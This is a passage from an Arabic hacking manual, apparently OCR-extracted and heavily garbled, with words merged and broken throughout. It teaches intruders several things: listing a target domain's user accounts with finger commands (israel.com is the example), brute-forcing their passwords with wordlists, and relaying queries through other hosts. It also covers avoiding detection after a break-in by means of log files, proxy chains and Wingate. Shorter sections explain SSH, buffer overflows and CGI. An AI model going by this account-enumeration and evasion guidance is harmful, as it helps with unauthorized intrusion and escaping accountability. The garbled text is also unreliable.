٣٠




Johnson Peter 

Mitnick Kevin 

Munson Greg 

Orwell Dennis 

الآن ماذاتعني هذه النتائج؟ 

نرىأسماءالمستعملین وفي الثاني"‏ (Name) الأسماءالحقیقیة "، 

التيبالطبعلیست حقیقیة،لكنفيمعظم الوقت حقیقة.‏ ویریناالعمود الثال ث(‏Tty‏)‏ النو عالطرفي the 

terminal type 

والرابع (Idle) فترةالتوق ف.‏time the idle وبعد ذلكفي العمودینالخامس والسادسالوقت والمكان 

الذياستخدمفیهال حسابللأتصالبالنظام.‏ 

.. 

في العمودالأول(‏ ( login 

أحیاناتوجدأعمدة بعنواوینالأیمیلات وأرقام هواتف الخالخاصةبمستخدمین هذاالنظامو إ ذاكنتترید 

المزید منالمعلومات عن مستخدممعیّ‏ ن Johnson‏)بیتر Peter جونسن على سبیلالمثال)أدخلالأمر 

التالي : 

johnson@israel.comfinger 

1.4 بع ضالخد ع عنداستخدام خدمةFinger 

< ========================= 

أتمنّىالآن شاهدت ما الضع ف الرئیسيلخدمة Finger. Fingerیریك deamon ماهي 

ال حسابات الموجوده على النظام.‏ وهذایعنيأنكتكسب ‏(عن طریققانوني من المجموعة 

السحریة وهيكلمات السر/مجموعةأسماءالمستخدمین التي ستمن حكالدخول(‏Access‏)إلى نظام.‏ 

إ ذا عرف تأسماءالمستخدمین،‏ ستكون الخطوة القادمة متوقفه علىبرنامج bruteforceأوبمعنى آخر 

% ٥٠ ( 

..... 

برامجتخمینالباسوورد wordlist passowrd cracker 

. 

هناك سكربتات خاصّة كتب تللتیلنت على سبیل المثالاذهبلموقع 

VLAD's حث عنpwscan.pl ‏/‏http://www.thehackerschoice.comأواب 

لذلك یجب علیكانتكونقائمة بكلماتالسرفي مل ف نصي (word او المفكره ( وحاولانتكونكلمات 

السرقریبة منأسماءالمستخدمین وإ ذالمتعمل القائمةاستخدمبرنامج-‏ bruteforceأنص حكبهذا 

الوق تانت حظرلككأس شاهيوتأخذلكاستراحة وتجعل البرنامجیعمل عمله-‏ 

بالطبع نجد بع ضال حسابا تللمستخدمینللنظاماكثراهمیة من غیرها منال حسابا ت.وخاصة حسابالإدارة 

بسببانه عندماتعر فالباسووردالخا صبهم وقتهاتستطیعالتحكمبالموقع 

. وبالطبع بع ضال حسابات سهلةتخمینكلمةالسر و لهنا ك بع ضالخدعلمعرفة هذاالنو ع منال حسابا ت.‏ 

على سبیلالمثال ‏...إ طبع الأمر : 

secret@israel.comfinger 

عندماترسل هذا الأمر الي Finger Deamon سیعطیك جمیعال حساباتالتيتحتوي علىكلمة 

أمّافياسم المستعملأوالإسمالحقیقي.اذا،‏ ماهوالشي المهمفي هذا؟ حسناأنتیمكنكأن 

تستعمل ‏"‏test‏"أو ‏"‏temp‏"أو ‏"‏‎٠٠٠٠‎‏"بدلا من "secret" وكماتعر ف من المحتملان یكون 

هذاالنو ع من ال حسابات سهلمعرفةباسوورداتهفيأ غل ب الأحیان.‏ 

finger .@israel.com 

0@israel.comfinger 

جرب هذه الأوامر وشاهد مایحد ث!‏ 

حاولالتعر ف على Deamon، Fingerأقرأ RFCوأوجد خدعكبنفسك!‏ 

( root) الجذر ‏(‏Admin‏)أو 

" secret" 

٣١




‎1.5‎الأستعلام عن طریق موقع بأستخدامFinger 

‏"استعلم")‏ 

" 

< ========================= 

إ ذاأرد تاناستخدم خدمة)‏ Finger معنى Fingerكفعل ألم س"‏ ولكنهاتأتيهنابمعنى 

والأستعلام عن موقعمعین مثل هذاwww.victim.com وأیضاتعر فأن موقع آخر 

خدمة Fingerتعمل،‏ 

عندها یمكننيان أقدم طلبا مثل هذا:(‏ اكتبفي مح ث الأوامر مثل هذا ( finger@host.com 

@victim.com 

Host.comیستعلم (Finger) الآن victim.com ویریكالنتائج.‏ 

أحدالفوائد من هذه الطریقةانك ستكون مجهوللدىvictim.com فعندماتقوم 

. 

www.host.com" ‏"یقدم 

http://www.victim.com/ 

) 

. 

بطلب سجل الدخول log) ستشاهد/‏http://www.host.comفي سجلاتهم،بدلا منك 

فائدةاخر ى وهيأنك یمكنان تترك)‏ Host موقع)‏ یقوم ) عن طریق خدمة(‏ Fingerبالأستعلام عن 

حاسوبا 

آخرا على نفسالشبكة ‏،بینمااذا طلب تانت هذا الأستعلام بأستخدام خدمة Finger من جهازكلنتكون 

مسموحةلكلأنك سأكون غیر موثوقبهلد ىالمستعلم عنه بعك ساذاكانالطلب ل لأ ستعلامباستخدام 

Fingerعن طریق موقع 

یعنيالخلاصة ‏:انالموقعالذيتریدالأستعلام عنه یعتبر حاسوبك الشخصي غیر موثوقبه بعكس اذاكان 

الأستعلام عن طریق موقعاخر یشابههفسو ف یسمحله 

.! 

" 

‎1.6‎الأستنتاج من هذا الدرس 

< ===============> 

( access ) یكون مصدر معلومات ضخملأي واحد یحاولكسبالدخول Fingerیمكنأن Deamon 

إلىالنظام.‏ 

Fingerقانونیایزوّدكبنص deamon فكلماتالسر واسماءالمستخدمینالتيتحتاجهالكسب 

الدخول.‏access 

هناكبضعة خد علطیفةتمكنك منمعرفة حسابات خاصةتب حث عنها منمعرفتكلهذهال حسابا تتستطیع 

كسرالباسووردات،‏ بإ ستعمالتقنیة wordlistأو.‏bruteforce 

تذكّ‏ رفوائد الأستعلام عن طریق موقع"أیضا بأستعمالdeamon Finger 

... 

٣٢

‏"شرح ال 


"secure shell 


$$$$$$$$$$$$$$$$$$$ 

الكاتب BURN_EG: ACID 

$$$$$$$$$$$$$$$$$$$ 

قداسبقهاالكاتببمقدمة من عنده .... 

تعتبرأداة secure shell منأهمالادواتفىالشبكاتوتعتبر هامة جدابالنسبةلمخترقيالمواقع و 

تستخدمهامعظمالسی رفرات علىالانترنت و غالبا ما نجدهابهذاالاختصار::‏ SSh 

ما هىال SSh؟ 

============== 

ال secureهىاداه shell ‏(برنامج)للاتصال و الدخول الىكمبیوتراو جهازاخر علىالشبكة لتنفیذ 

اوامراو مهاممعینه داخل هذاالجهازبمعنىالاتصال عن بعد remotelyوتستخدم connection 

ایضافى نقلالملفات منكمبیوتر الىاخر و هىتقدمتوثیققو ىو اتصالامن جدا فىقنواتالاتصال 

الغیرامنه وهىتعتبركبدیل جید جداا لادوا تتستعمللنفسالغر ضفى یونكس مثل (rlogin,rsh and 

rcp). 

وتقدمایضاال secure shell اتصالامن جدالشحنات اتصالاتال tcpكونیكشن . 

و هنا یأتى سؤال مهم :: و السؤال هو 

:: 

لماذا یفضلاستخدامال secure shell علىالادواتالاخر ىالتى یطلق علیها ‏-‏rفى commands 

یونكس كالمذكورینفىالاعلى ؟ 

====================== 

فىتوزیعاتالیونكس مثلال BSD‏*ت تعر ض الادواتالتى یطلق علیها -r commands مثل 

rcp) rlogin,rsh and ‏)الىانوا ع مختلفه من الهجمات حیثانهلو شخ صاستطا عان یكتسبال 

روتاكسیس access) root‏)للاجهزهالتى على الشبكهبطریقه مااو فعلها ن طریق اتصالفیزیائى 

ا ى ریموتلى یمكنهان یدخلالىكلبیاناتالاجهزه التى علىالشبكهبدونادنىصعوبه لانه یستطیع 

بالروتاكس سان یعبر من خلالا ىاداه منالمذكورهفى یونكسبدون ا ىصعوبه و یمكنهتفادیهابطرق 

معینه و هذا ما یسمى بأنالشخ صلدیه unauthorized access to systems اعتقدانكم 

فهمتونىالانو یمكنایضا لا ى شخ صانیراقب النت وركترافیك و یلتقطكلالباكیدجس من خلال 

شبكتك وتكون هذهالباكیدجستحتوى علىالباسوردسللسیستمل شبكتك.‏ 

ملحوظه:‏ طریقه مراقبهالنت وركترافیكهى طریقه حقیقیهفىالاختراق وتستخدمفىاختراقالمنظمات 

الكبر ى وتقعتح تبندتقفىالاثر والاعدادللاخت راق 

والاننعود الىالسیكیور شیلومزایاالسیكیور شیلتظهر هنا معكل عیوبالادواتفى یونكس 

فالسیكیورشیل یطالب الشخ صالذ ىلدیه الروت اكسسایضا بأنیتصل اتصال موثوق عبره ا ىلایعطیه 

الح قللدخول الىبیانا تاجهزهالشبكهالابالباسورد و لا یمكن التحایل علىال sshفى هذهالنقطه و 

بذلك حتىلوتمكنالشخ ص مناكتساب الروتاكس سلن یستطسعالاطلا ع علىبیانات الشبكه الا ب 

. ( 

authorized access to systems . 

و النقطه الثانیههىاناذا حاولاحداختراقك عن طریق مراقبه النت ورركترافیكلشبكتك والتقاط 

الباكیدجسالتىتحمل معلوماتك وباسورداتكفسیخیبامله لان السیكیور شیل لا یرسل الباسورداتفى 

صوره واضحهكماترسلهاادوات یونكسالاخر ى ولكن یرسلها مشفره ولذلك سیكون علىالمخترق 

٣٣




( 

محاولهفك الشفره والخ 

ولكن معكل هذه المزایالم یخلىال secure shell من الثغرات ولكنتعتبرثغراتهقلیلة وتقریبا 

معظمها یحتاجالىالرووتاكسس والاخرى یمكنانتخترقالسیكیور شلفقطبها ‏(هذاكلامبینى وبینكم 

والان سؤالاخر 

. 

. 

:: 

ما هىانوا عالهجومالتىتحمى منهاال ssh؟ 

========================== 

‎١‎‏-تحمى منال ip spoofing اىتحمى منانتحال عنواینالا ىبى حیثانهلوارسل شخ ص ما 

باكیدجس منا ىبى یظهرانه موثوقبه ولكنهفىالحقیقهلیس موثوقبه یكشفهال sshوتحمىایضا 

من المنت حلین على الشبكهالم حلیهاى.‏ localy 

‎٢‎‏-تحمى مما یسمىال DNS spoofing 

‎٣‎‏-تعتر ض ظهورالتیكستسالتى یكون مخزن علیهاالباسورداتالواضحه وبیانات الهوستس . 

٤ ‏-تحمیك منمعالجهالبیاناتالمخزنهاىتمنعا ى شخ ص غیر موثوقبه من عملایدیت لا ى داتا مخزنه 

. 

ولكن معكل هذافأنال sshلی سامنبدرجهكبیره حیثانالاشخا ص ذو خبرهكبیرهفى النت ورك 

یستطیعونان یجعلونال sshینقطع عنالاتصا لاى disconnected ولكن لا یمكنان یكسرو 

تشفیربیاناتهاویعیدواتشغیل الترافیك الذ ىكان ینقلها . 

وایضاكلالاشیاءالتىتكلمنا عنهابلأعلى سو فتعملفقطاذاكن تتستخدم خاصیهالتشفیر التىتسمح 

لكبهاال ssh و هىتسمح بأكثر من 

ماترید منهم وایضا هناكاوبشناى خیارفىالاداهتسمح 

لك بعدمتشغیلالتشفیرا ى"‏ encryption of type "none وبهذاتجعلنىاقول علیكاحمق ‏!لان 

هذا یجعلال ssh سهله الاختراق مثلالادواتالتىتم ذكرهافىاولالمو ضو عفى یونكس حیثان هذا 

ال ssh 

نوعتشفیر مثل-‏RC4‎ (three-key triple-DES, DES, 

Blowfish) TSS, ‏,‏‎128‎یمكنكاستخدام 

، 

التشفیر ایضا یمنعال ipوال spoofing DNS spoofing و هذاایضابالاضافهالىتغییر مفاتیح 

فكالتشفیركل فترهمعینه ویتمتدمیر مفاتیحالتدمیر التىتماستعمالهاتماما.‏ 

اذنفهىاداه حقا ممیزه وتستحقالاحترام والاهتمام معانها لاتخلو من الثغرات ولكنلنجعلهاافضل 

ال موجود حالیافى هذاالمجا ل...‏ 

٣٤




" 

شرح معنى الOverflows Buffer 

" 

$$$$$$$$$$ 

الكاتب : Lamer 

$$$$$$$$$$ 

وتوجد العدید منالكتاباتفي هذاالموضو علكني حاول تاناكتببطریقة مبسطةاكثر حول هذاالموضو ع 

بطریقة یفهمهاالجمیع 

- ١ ماهو ال Buffer؟ Overflow 

-٢ المعالجه(‏Proccess ( 

‎٣‎‏-إدارة الذاكره(‏management (Memory 

‎٤‎‏-استغلال ماذكرفي الOverflow Buffer 

‏*یجب علىكل مختر قانیتعلمكل مهمفيالبرامج وادارة الذاكرة ومواطنضعفها وقوتهالیستطیع 

التعاملمعها والتحایل علیها ومن هذاالمنطبقكان هذاالمقال ..... 

ماهو الOverflow Buffer؟ 

. 

-١ 

------------------------------------ 

Buffer Overflow 

حالةتحد ثلبرنامجبسبب خللبرمجيفيبرمجتة هذا البرنامج 

احد ثثغرة یمكنكأستغلالها من نو ع Bufferتسمىفایروس Overflow ، red' 'code التيأستغلت 

في خادم IISلمایكروسوف ت-‏ -MS web server 

عموما،‏ یحد ث Buffer Overflow عندما یظهربرنامج ما متغیّرب حجمثابت ‏(على سبیل المثال،‏ حجم 

‎٢٠‎بای ت)‏ والقیمةالتي خصّصتإلى هذهالمتغیّ‏ رأكبر من حجمالمتغیّ‏ ر.‏ 

خذ هذا المثال : 

یظهربرنامجي علىالشاشة هذها ال رجاءادخالاسمالمستخدم ‏"وانا مثلابرمجة هذا البرنامج 

بح ث یكون منطقیااناسمالمستخدملنیتجاوزفياسوأالحالات ٣٠ حرفا مثلا 

البرنامجبشكل طبیعيلكن متىتكون المشكلة 

المشكلة هناتكوناذاتمادخل مثلا ٢٠٠ حر فكاسمللمستخدمفالبیانات هذهالزائدةتكون عبارة عن 

طفحان وهو ما یسمىبال Overflow" ‏"على الذاكرةالتي خصّصتلمتغیّ‏ رالاسم.‏ 

عندما یبدأالبرنامج،تخصّ‏ صالذاكرة 

STRING(30) وسیعمل 

..... 

لجملة:‏ " 

: 

اذنكی فأستغلّ‏ هذا الخطأ؟؟؟ 

قبلأنتصل لاجابةعلى هذا السؤال سنأخذ جولة حول مایتعلقبهذاالامرفيبنیة الحاسزب.‏ 

في هذه المقالة سنناق ش نظاملینكس ‏،‏linuxلكن المفهوم مماثللباقي الأنظمة.‏ 

- ٢ 

المعالجه:(‏Proccess ( 

--------------------------- 

٣٥




إنّ‏ الوحدة الوظیفیةالأساسیةفي حاسوبیعمل هي عملیة المعالجه.(‏Proccess‏)في الحاسوبهنالك 

العدید منالعملیات ونظامالتشغیل مسؤول عنتقسیم القوّةالتيتجعل العدید من العملیاتتعملفي نفس 

الوقتفي الحاسوب.‏ 

ص حیح...كی فاذن؟؛ان َّ وحدة 

لیسهناك شيءإسمه 

تنتقلبینالعملیاتكلُ‏ على حدهبسرعةكبیرهب حی ثتبدو مثلالعدید منالمهام 

المعالجةا 

التيتعملفي وقت واحد،‏ 

.. (: 

" متعددالعملیات proccesses" Multi- 

لمركزیة (CPU) 

اذاتبدولناكأنالعملیاتتعملفي وقت واحد وهذه من خد ع الحاسوبالتيیؤدیها علینا 

كلّ‏ عملیةلها عنوانفاضي منالذاكره ، ولایمكنلأي عملیةآخر ىتدخلفي هذاالمكان الفاضي من 

الذاكرة.‏ وهذا یرشدناالى شياخر یجبانتفهمه وهو : 

- ٣ إدارة الذاكره:(‏management (Memory 

------------------------------------------------ 

تدیرأنظمة التشغیل-‏systems operating ‏-الحدیثة ذاكرةافتراضیة(‏memory virtual ظاهریة).‏ 

وهذه الذاكرةتفید عندما یكونلدینا عددكبیر منالمهام موجه الى الذاكرةالحقیقةالرام ... وفي نفس 

الوقتفالذاكرةالحقیقةأصغر منكمیةالمهام الموجههللذاكرةالحقیقة 

هنا یأتي دور الذاكرةالافتراضیة حی ثتقومبخزنالبیاناتاو المهامفي مكان ما على الهاردیسكفي 

وتعامل هذهالبیانات وكأنهافيالذاكرةتماما ویتم 

منطقة یطلق علیهاال 

عملیة نقلها من والى الذاكرةبادارة هذه الذاكرةالافتراضیة من خلال عملیة یطلق علیها 

وهذا ملخ ص عنالذاكرةالافتراضیةاما الذاكرةالحقیقةفهيمعروفةلد ىالجمیع والتي یطلق علیها 

swapping 

) 

... 

Back store او SWAP 

READ ONLY MEMORY او الذاكرةالفیزیائیة ... 

(RAM 

------ 

‎٤‎‏-استغلال ماذكرفي الOverflow Buffer 

--------------------------------------------- 

الآن نصلإلىالجزء الأهم والمرح ‏....كی ف نستفید منالذيقلنا عنالمعالجة وإدارةالذاكرةللوصول 

والدخولالى الجذر (Root) وأختراق النظام؟تذكّر ن حنقلنافي وقت سابق بأنّه عندما یكون 

الإدخال(‏ البیانا ت)‏ منالمستخدمأكبر حجما منالذاكرةالتي خصّصتلهذه البیانات ‏،البیاناتالزائدة ستفی ض 

فيالذاكرة التي بعدالاسمالمتغیّ‏ ر؟ هذا المكان من الذاكرة هوالمكان الذي نستفید منهفي 

الأختراق.‏ 

ماذانعملفي ذلك المكان:‏ داخل خط ) مكان)البیاناتالتي ید خلها المستخدم فيالمثالالسابق وهوالاسم 

الأول الذي یطلب منقبل البرنامجثمأدخلناه نضعالأوامر الأكثرشعبیةللحاسوب،‏ حی ث هذهالأوامر 

تجعل الحاسوب یحد ث(ینتج)هیكل نستطیعاستخدامهفیما بعدللقیامبالسیطرة الكاملةللنظامالمستغلّ.‏ 

القیامبهذاالعمللی سبیسطاكما یبدولك،إذنلوأردتمعرفةكی فیعمل ‏،أنت یجبأنتقرأ المقالة 

القادمة حول Overflows، Buffer الذي سیص فبالضبطكی ف لإ ستغلال واحده منال Buffer 

فيا لإختراق 

) 

( 

. 

( overflow) 

Overflows 

٣٦




كانت هذهةمقدمةبسیطة ومهمةللمخترقینلأنها ست ردد علیهمكثیرافي مواقع السیكیورتي حیث یوجد 

العدید من الثغرات حول هذه المشاكلامافي وقت المعالجةاوفي الطفحانالحاد ثفي الذاكرةنتیجةلما 

سبق ذكره .... 

٣٧


ال CGI وعلاقتها بالإنترنت 

" 


" 

$$$$$$$$$$$ 

م ن ق ول 

$$$$$$$$$$$ 

في هذا المل ف سو ف نقوم بعر ض مقدمةال CGI و علاقتهابالانترنت : 

CGI مقدمةلل 

(١) 

CGI=COMMON GATEWAY INTERFACE 

هيالواجهةالتيتسمحبالاتصالبین جانب 

المستخدم عن طریقالمتصفحأو البرامج و خلافه و جانبالویب سیرفرالذي یفهمبروتوكول 

(HTTP) 

) ٨٠ 

. 

ال TCP/IP هوالبروتوكول الذي ی ستخدمه سكریبتالسي جيأي والسیرفر أثناءالاتصال ‏.البورت 

المحددةلهذالبروتوكولهي من الممكنأن تتغیر هذه البور ت)‏ . 

تستطیع سكریبتاتالسي جيأيأنتقوم بتولید صفحات الویب والصور وأیضانتائج محددة طبقا 

لمدخلاتمعینه یقوم 

مبرمجالسي جيأي بتحدیدها 

یقوم عمل سكریبتاتالسي جيأي علي خطوتینأساسیتین 

‎١‎‏-فيالخطوةالأولى یقوم السكریبت بعملمعالجةأولیهللبیانات التيأدخلتله . 

‎٢‎‏-فيالخطوةالثانیةیعملالسكریبتكقناهللبیانات التي یقومالمتصفحبارسالها اليالسیرفرأوالعكس . 

یقوم سكریبت السي جيأي بتشفیرالبیانات حتي تتمكن من العملفيأي منا خللعمل.‏ 

یمكن كتابة سكریبتالسي جيأي بأيلغةبرمجة سواءكانتلغة مجمعة مثلالفیجوالبیسكأولغة 

مترجمة مثلالبیرل و الفرقالوحیدبین نوعیناللغات أنالبرنامج المبرمجباللغةالمجمعة سو ف یكون 

أسر عفيالتنفیذ ولكناللغاتالمترجمةأسر عفي عملیة التطویر . 

للسكریب تاذاأرد تأنتعمل عليتعدیل السكریبتأوتطویره 

أهمالأوامر التيتعتبروثیقةالصلهلموضوعناهيكالتالي 

هذاالأمر یقومبطلببیانات منالسیرفرللمتصفح . 

٢- POST هذاالأمر یطلب منالسیرفرقبول المعلوماتالمدخلةالیه منالمتصفح . 

هذا الأمر یطلب منالسیرفرقبول المعلوماتالمرسلهالیهكبدیل عنالمدخلات الموجودة حالیا 

: 

: 

GET -١ 

PUT -٣ 

. 

(٢) 

نقاط الضع ف : 

نقاطالضع ف التي یسببها سكریبت السي جيأيلیسضعفافيالسي جيأي نفسه ولكنه ضع ففي 

بروتوكول الHTTPأوفيأنظمةالتشغیلالمختلفة . 

السي جيأي یسمحباستغلال نقاط الضع فالموجودة ولكن هناك طرقأخريللوصولاليت حطیم النظام 

الأمني ‏.كمثال یمكن الوصولاليالملفاتالغیر محمیةباستخدام ال FTPأو ....TELNET 

٣٨




الفصل الثاني 

 

‏((الحمایةوالتخفي))‏ 

٣٩



‏"الأمن 

و(((التخفي)))‏ في الإنترنت"‏ 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 

الكاتب : JawaDal & ال hi_haCker 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 

د‏ ر & 

علىكل مخترققبلأن یفكرفياخترقأي موقعانیتعر ف علىكیفبة حمایة وتغطیة اثارهفما هيالفائدة 

انتخترق موقعثم یحكم علیككمجرمبالسجنل.......وسو فتنسى بعدهاكل مایتعلقبالاختراق لانك 

ستكون مراقب مراقبة شدیدة ‏......الخ 

وأكثر نقطةتكون مصیدةلكثیر منالمخترقین هي ملفاتالوجس LOGsفمثلا عند دخولك لا فتيبي 

موقع من خلا لأيثغرةكانتفهذایعنيانهتماختراقكبالفعلاذالمتكنقد وضعاحتیاطتكلذلك وحاولت 

انتكون !! anonymous 

لانكبمجرد الدخولللا فتيبي في حاجهاسمها‎1‎ LOGS...(LOG.FILES) وهنا مرب طالفرس 

الكل سیسالالان عن وضیفة هذه ? Logs 

الfiles log هيالتيتقوم بتسجیل كل شخ ص اتصلبالجهاز in) loged‏)و ی حصلوا علىمعلومات 

مثل : 

.... 

... و مناي موقع اتیت ‏....فصلتأو 

وقتالدخول ‏((وقت عملیةالاخترا ق))بالضبط Addressلك 

الدوله 

المدینه 

نظامالتشغیل 

صبك(‏provide(ISP Internet server 

و مزود الخدمهالخا المتصفح ‏!!!!هل رأیت مدى خطورة هذاالامر وكیفیة سهولةاصطیادك منقبل الجهات المسؤولة عن هذاالموقع 

أو غیره 

وهنالك ‎٣‎انوا ع 

- یسجلكل دخول\خروج،‏ مع میعادالدخول\‏ الخروجبالاضافهالىالhost 

‏-من Onlneفي هذهالل حظه 

اخر دخول 

IP ‏..ال online 

‏...الname host ‏(اسمالجهاز)‏ .... 

log files مهمه:‏ 

– 

... 

!!!... 

WTMP 

UTMP 

LASLOG 

والكثیرالكثیر!!لذالوأرادالادمنان یلقي نظره علیهم 

(log.files) 

(down 

سو ف یوقعبك(‏ track you 

ربمایتبادرالى ذهنكوتقول ‏:لیست هنالكأي مشاكلانا ساستخدمبروكسیین هنالكامر یجبانتعرفه 

عنالبروكسیات 

جهازك-->‏ خاد مالبروكسي-->‏ الموقع--‏FTP‏--تلنتاواي شئاخر!‏ 

لواخترقت موقع والادمنارادانیعر ف مصدرك ومنانت فبقلیل منالمال یستطیعالایقا عبك او حتي 

یخترقالبروكسي سیرفر و سیعر ف عنككل شئ نفسالكلاملوكن تتستخدماكثر منبروكسي 

جهازك-->‏ خادمالبروكسيالاول-->‏ خادم البروكسيالثاني-->‏ 

فانباستطاعتهان یصلالیكلكن ذلكیتطلب منه جهدا ومالا 

الثالث--‏on ...--so 

‏...لكنفيالاخیرباستطاعتهالوصولالیك . 

. 

.. 

٤٠



Wingate :- 


لكنتقدرایضاتستخدم شیئاسمه..‏ 

Wingate هوبروكسي ولكن مع جدران حمایة وسأتكلم عنهبشئ منالتفصیل لاحقا وهویسمح 

بمشاركهكونكشنانترنت واحداواكثر..فائدهالWingateانه سیخفيالIP عنالكمبیوترالذي ست صل 

به!!‏ 

وهذه بع ض الملاحظات یجبانتضعهافي حسبانكفیجبانتعر فكی فتبقى 

مثلال . alarm zoneامسح ملفا ت 

..web وكی فتؤمن جهازك؟!!......‏ 

كالكوكیز والانترن تهیستوري و ملفاتالانترنت المؤقته..والملفاتالشخصیه و 

اللوق ‏)وهنالكبرنامج رائع یكفیك مؤونة هذه الاعمالاسمه windowsیجبان washer یكونلدیك.‏ 

anonymous علىال 

how to 

استخدم firewall 

الهیستوري ) 

والكثیر.اذهبلجوجل و اكتب howاو to Be anonymous on the web 

و لاتنسىا لPGP)d‏)‏ Preetyانه Good Privacy مجاني ‏..یجبان یكون عندكلوكنتترید 

اختراق موقع و تتركایمیلكفیه!فهو جمیل جدافي عملیةالتشفیر 

تستطیعانت حصل علیه من:‏ /http://www.pgpi.org 

... 

سأشرحالانبشئ منالتفصیللبع ض منالامور الهامة وسنذكر هنا بع ضالطر قللتخفي واخفاءهویتك 

: في الشبكة 

Proxy - Sock Host - Wingate 

------------------------------------------- 

Proxy Server 

proxy server ) 

؟؟؟ 

ما هو ال 

خادم الوكیل)هو خادم server نقوم من خلاله بعملیاتالاتصالالمختلفة سواء مع 

المواقعاو معالاجهزةالاخرى من خلال الشات وووو ‏..الخ فعند اتصالكبا لإنترنت من خلال proxy 

فإن جمیع اتصالاتك سو فتذهبإلى هذاالبروكسيالمستخدمأولا وقبلكل شيءثمیتمالاتصال 

بسیرفر الموقع المطلوب لتكونالاجابةهيتحمیلالموقعالمطلوب ‏....فمثلاإ ذاأرد تأن تتصلبا لإنترنت 

وتریدأن تتصفحوتفتح موقعاكهذا 

.. علیكأولابالطلب من هذا proxyثم server یقوم proxy 

من خادم server الموقع ومنثم 

serverبطلبالصفحة 

تحمیلهاوتخزینهالدیكبمعنىانك سو فتستطیعا ستعر ا ض هذهالصفحة 

ستلاحظ من خلال ما ذكرتبالتأكیدأن هذهالعملیةتأخذكمیةقلیلة نالبیاناتمقارنة مع الوقتالمستهلكفي 

طلب هذهالصفحةفالوقتأطول وكمیة الباتات الواصلةالینااقل مقارنةبالإتصال العادي ‏(بدونبروكسي)‏ 

حیث من وقت طلبالصفحة سیتجهالطلب مباشرة منكالى سیرفرالموقعالمطلوب ثمیتمتحمیلها مباشرة 

ب حیثتستعرضهافي متصفحكفي وقتاقل ‏...اذن مع اتصالكبللبروكسي سیرفر سو ف یصبح اتصالك 

با لإنترن تبطيء مقارنة معالاتصال المباشر وذلكلأنكل صفحةتقوم بتحمیلهاأيتستعرضهاتذهبإلى 

ممایؤديالىابطاء عملیةالتصفحالافي حالة نادرة وهوان یكون 

هذا البروكسي 

البروكسي سیرفرالمستخدمقریب منالمنطقة التيتوجدبهاانت ‏.اوانیتفق وانتٌطلب نفسالصفحة 

التيانت طلبتها من شخ صاخرله نفسالبروكسي الذيتستخدمةانتفي وقت سابققبل طلبكلهذه 

الصفحة 

... 

server 

من خلالاستخدام proxy server 

http://www.3asfh.com/vb/ 

http://www.3asfh.com/vb/ 

proxey server 

. 

[User] >>>>>>>>>> [Proxy] >>>>>>>>>> [Web Page] 

ip 

لماذا نستخدم البروكسي سیرفر؟ 

لعدةاسباب ‏:السبب الرئیسيهوللحفاظ على هویتك والبقاء مجهولافك عملیاتك التيتقومبها على هذه 

الشبكةالمكشوفة والمراقبة منالأعینفيكل مكانب حیثانه حتىلوتماصطیادكفاننهم سی حصلون على 

البروكسيالمستخدمفي عملیةالاتصال لانههوالذي یقوم بعملیةالاتصالبسیرفرالموقعالمطلوبكما 

ذكرنافهوالوسیطبین المستخدم وسیرفرالموقعالمطلوب . وانا لا أقول بأنه لا یمكنالوصولالیك 

... 

٤١




یمكن ولكنبصعوبةبالغة وعملیاتتقفي طویلة وممایزید منصعوبتها هواستخدامك لعدد اكبر من 

البروكسیات 

سبباخراناغلبمزودي الخدمة ISP یقومونب حجبالكثیر من المواقعالمهمةففيكثیر منالدول 

كالسعودیة والامارات وغیرها نجدان مواقعالهكر بنسبة مغلقةاواكثر وانا اتكلم علىالمواقع 

الاجنبیة ولیستالعربیةالى غیر ذلك ... فهناتضطرالىاللجوءالىالبروكسیا تللوصولالى هذهالمواقع 

نقطةهامة ضعهافي حسبانك وهيكلماكانالبروكسيقریبا منالمنطقةالتيانتبهاكاناداء 

البروكسياسر ع . 

%٤٠ 

Proxy Chaining ‏(وتعني سلسلةبروكسیات)‏ 

---------------------- 

٠... 

: 

وهيتعتبرفعالة جدافياخفاء الهویةلكنها غیر فعالةتمامافي سرعةالاتصال حیثكلما زاد عدد 

البروكسیا تكلمااصبحالاتصالابطأ 

مثال/‏ 

[ User]>>>>>[Proxy 1]>>>>>[Proxy 2]>>>>>[Proxy n]>>>>>[wep page] 

ftp 

وكما نر ىفانك ست صلبالبروكسيالاولثمبالثانيثمبالثالثثم ‏...الىان تتصلبالموقعالمطلوب ولیسا 

شرطابان یكون موقعافقد یكون 

اذنفاستخدام سلسلة منالبروكسیا تامر ضروريلكل مخترق و خصوصااذاشعربالخطر وانه مراقب 

ویجب علیهانیتوخىالحذر دائما وذلك حسب مبدأ paranoid" " المعرو فلكل هكر 

.... 

‏..الخ . 

في نهایةالمطا ف سنتحد ث عنكیفیةال حصول علىالبروكسیات وطریقةاختبارهاوتحدیثها 

وهذا المفضللدي 

... 

. 

http://www.multiproxy.org/anon_list.htm 

http://tools.rosinstrument.com/proxy/ 

.. 

او عن طریق مجموعةالبروكسيالشهیر ة عبرالیاهو P_R_O_X_Y@yahoogroups.com 

وهيتقومبمراسلتك بأحد ثالبروكسیات وطریقةالانضمامالیهم هوبارسال رسالةفار غةالیهم وفي 

عنوان المرسلالیهاكتب P_R_O_X_Y-subscriber@yahoogroups.com و سو فتتلقى 

رد مباشرة وتصبح احداعضاء الجروب 

وتستطیع التأكد من عملالبروكسي من خلال عدة مواقعتوفرلك هذه الخدمة وأشهرها هو 

http://www.proxytester.com/ 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 

ماهو WinGate؟ 

هو proxyأي server firewall یفوقالبروكسي وهو خادمبروكسي ذو حاجز ناري یحتوي على 

حزمةكبیرة وضخمة منالبرامج المختصةبالحمایة والتيتبقیك)‏ Anonymously مجهول الهویة)‏ 

wingate 

متشابه معالبروكسي سیرفر حی ثیعمل اتصالات معكومبیوترلسیرفر آخر خلال المنفذ , ‎23‎فيالحقیقة 

هو اتصال.‏ Telnet 

كیفیةال حصول علىWinGate؟ 

بإ مكانكتاخذ عنوان wingate منأصدقائكإ ذاكانلدىاحد منهم 

ایضاتستطیع فعل ذلك من خلالبرامجبحث مختصة بذلك مثل WinGate Scanner حیث یجب علیك 

فقطتحدیدال IP والهوست نیم واترك الباقيللبرنامجلیقومبمهامه وللمزید حول هذاالموضو عأنصحكم 

بالب حث من خلال خادم الهكرز ‏(جوجل ‏)لأن خبرتيفي هذا المجالقلیلة ولانيلماستخدم هذه الطریقة من 

قبل 

. 

٤٢




Socks Host 

؟ 

ما هو ال 

